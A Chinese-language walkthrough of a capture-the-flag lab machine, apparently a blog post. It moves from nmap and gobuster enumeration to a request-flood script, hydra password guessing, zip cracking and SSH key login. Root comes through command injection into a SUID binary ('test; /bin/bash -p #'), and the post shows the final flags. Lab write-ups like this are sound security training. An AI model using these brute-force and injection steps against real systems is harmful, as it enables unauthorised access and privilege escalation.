Mazesec_Bruteforce

靶机来源：QQ群-660930334

难度：Easy

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24               
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:18 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00048s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00059s latency).
MAC Address: 08:00:27:ED:AA:8A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.68
Host is up (0.00060s latency).
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.52 seconds

靶机IP：192.168.2.68

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.68
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:19 +0800
Nmap scan report for 192.168.2.68
Host is up (0.0011s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.68
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:19 +0800
Nmap scan report for 192.168.2.68
Host is up (0.00067s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Service Unavailable
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|6.X|2.6.X|3.X (93%), MikroTik RouterOS 7.X (93%), Synology DiskStation Manager 5.X (85%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2
Aggressive OS guesses: Linux 4.15 - 5.19 (93%), Linux 4.19 (93%), Linux 5.0 - 5.14 (93%), OpenWrt 21.02 (Linux 5.4) (93%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (93%), Linux 6.0 (92%), Linux 5.4 - 5.10 (87%), Linux 2.6.32 (87%), Linux 2.6.32 - 3.13 (87%), Linux 3.10 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.90 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.68                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:20 +0800
Nmap scan report for 192.168.2.68
Host is up (0.00092s latency).
All 100 scanned ports on 192.168.2.68 are in ignored states.
Not shown: 100 open|filtered udp ports (no-response)
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

二、WEB渗透

1、HTTP 服务枚举

访问80端口，提示Bruteforce Node-1 目前正在进行固件升级。

2、目录扫描

尝试进行目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.68
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Extensions:              bak,php,html,js,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html           (Status: 200) [Size: 1069]
maintenance.html     (Status: 200) [Size: 1884]

找到目录maintenance.html 提示我们检测到交通流量峰值，已经暂停80端口的服务，转而开放了9090端口

3、9090端口暴露

那么可以尝试使用大量的流量去访问80端口，迫使9090端口开放

import requests
import time
import threading
import sys
import random
import string
import socket

TARGET_IP = "192.168.2.68"
TARGET_WEB_PORT = 80
TRIGGER_COUNT = 100
TIME_LIMIT = 10

def generate_random_path():
	return "".join(random.choices(string.ascii_lowercase + string.digits, k=10))
	
def send_brute_request(counter):
	try:
		url = f"http://{TARGET_IP}:{TARGET_WEB_PORT}/{generate_random_path()}.html"
		response = requests.get(url, timeout=2)
	except requests.exceptions.RequestException:
		pass
		
def check_port_open():
	print(f"\n[*] 正在尝试连接 {TARGET_IP}:9090 验证结果...")
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.settimeout(3)
	try:
		result = sock.connect_ex((TARGET_IP, 9090))
		if result == 0:
			print(f"[SUCCESS] 成功！端口 9090 已开放！")
			return True
		else:
			print(f"[FAIL] 端口 9090 仍然关闭 (代码: {result})。")
			return False
	except Exception as e:
		print(f"[ERROR] 连接检查出错: {e}")
	finally:
		sock.close()
		
def main():
	print(f"[*] 开始对 {TARGET_IP} 进行80端口目录爆破")
	print(f"[*] 目标: 在 {TIME_LIMIT} 秒内触发 {TRIGGER_COUNT} 次爆破发送")
	threads = []
	start_time = time.time()
	for i in range(TRIGGER_COUNT):
		t = threading.Thread(target=send_brute_request, args=(i + 1,))
		threads.append(t)
		t.start()
		time.sleep(0.02)
	print(f"[*] 所有请求已发出，正在等待线程完成...")
	for t in threads:
		t.join()
	duration = time.time() - start_time
	print(f"[*] 完成。耗时: {duration:.2f} 秒")
	if duration > 10:
		print("[-] 警告：耗时超过10秒，可能无法触发规则。")
	check_port_open()
	
if __name__ == "__main__":
	if len(sys.argv) > 1:
		TARGET_IP = sys.argv[1]
	main()

重新进行端口扫描，发现9090端口开放了

┌──(root㉿kali)-[~/miaosec]
└─# nmap -p 9090 192.168.2.68
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-04 22:45 +0800
Nmap scan report for 192.168.2.68
Host is up (0.00059s latency).

PORT     STATE SERVICE
9090/tcp open  zeus-admin
MAC Address: 08:00:27:BF:DC:E1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds

使用kali进行访问9090端口

发现是一个登录框，尝试进行爆破

┌──(root㉿kali)-[~/miaosec]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.2.68 -s 9090 http-post-form "/:username=^USER^&password=^PASS^:Invalid"
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-04 23:07:07
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.2.68:9090/:username=^USER^&password=^PASS^:Invalid
[9090][http-post-form] host: 192.168.2.68   login: admin   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-04 23:07:43

找到账号和密码：admin:password123

下载备份文件

三、压缩包爆破

解压压缩包，发现需要密码

┌──(root㉿kali)-[~/miaosec]
└─# unzip site_backup.zip 
Archive:  site_backup.zip
[site_backup.zip] README.txt password: 
   skipping: README.txt              incorrect password
   skipping: ssh_login_key           incorrect password

进行爆破

┌──(root㉿kali)-[~/miaosec]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u site_backup.zip 


PASSWORD FOUND!!!!: pw == rockyou

找到密码：rockyou

解压，找到一个ssh_login_key

┌──(root㉿kali)-[~/miaosec]
└─# unzip site_backup.zip                                              
Archive:  site_backup.zip
[site_backup.zip] README.txt password: 
password incorrect--reenter: 
 extracting: README.txt              
  inflating: ssh_login_key

四、获取ta0权限

查看ssh_login_key，是SSH登录的私钥结合给的提示，猜测用户名是ta0

┌──(root㉿kali)-[~/miaosec]
└─# ssh -i ssh_login_key ta0@192.168.2.68
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Linux bruteforce 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jan 25 07:16:48 2026 from 192.168.56.104
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
ta0@bruteforce:~$ id
uid=1000(ta0) gid=1000(ta0) groups=1000(ta0)

五、权限提升

查看suid文件

ta0@bruteforce:~$ find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/opt/scripts/sys_monitor

找到一个可疑文件/opt/scripts/sys_monitor

1
2
3

ta0@bruteforce:/opt/scripts$ ./sys_monitor 
System Monitor Tool v2.0 (Secure Mode)
Usage: ./sys_monitor <auth_token> <service_name>

需要一个token和服务名

进行反编译

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __uid_t v4; // eax
  char s[512]; // [rsp+10h] [rbp-200h] BYREF

  if ( argc > 2 )
  {
    if ( !strcmp(argv[1], "X-MNT-9921") )
    {
      setresgid(0, 0, 0);
      setresuid(0, 0, 0);
      v4 = getuid();
      printf("[+] Identity Verified. Running as UID: %d\n", v4);
      snprintf(s, 0x200uLL, "/usr/sbin/service %s status", argv[2]);
      puts("--------------------------------");
      printf("Executing: %s\n", s);
      system(s);
      puts("--------------------------------");
      return 0;
    }
    else
    {
      puts("Access Denied.");
      return 1;
    }
  }
  else
  {
    puts("System Monitor Tool v2.0 (Secure Mode)");
    printf("Usage: %s <auth_token> <service_name>\n", *argv);
    return 1;
  }
}

第一个参数值一定要是X-MNT-9921才能进入下面的语句进来之后就是一个将进程的所有id都设置为root 然后就是第二个参数，本来程序是想让用户输入某个服务去检查他的状态，但是直接拼接到语句里面了，没有做其他的过滤，那就可以直接去要一个bin/bash

ta0@bruteforce:/opt/scripts$ /opt/scripts/sys_monitor X-MNT-9921 "test; /bin/bash -p #"
[+] Identity Verified. Running as UID: 0
--------------------------------
Executing: /usr/sbin/service test; /bin/bash -p # status
test: unrecognized service
bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
root@bruteforce:/opt/scripts# id
uid=0(root) gid=0(root) groups=0(root),1000(ta0)

六、查看FALG

root@bruteforce:/opt/scripts# cat /root/root.txt /home/ta0/user.txt 
flag{root-5f1e9d2c8b4a7e3d0c6f9b1a5e2d8c4f}

flag{user-8a2c4e6d1b9f3a5e7d0c2b4f6a8e1d3c}

Maze-sec

#Bruteforce #Node #zip #汇编

Mazesec_Bruteforce

http://miao-sec.github.io/Maze-sec/Mazesec-Bruteforce/

作者

Miao

发布于

2026年2月5日

许可协议

BY-MIAO

Mazesec_Tmp 上一篇

Mazesec_115final 下一篇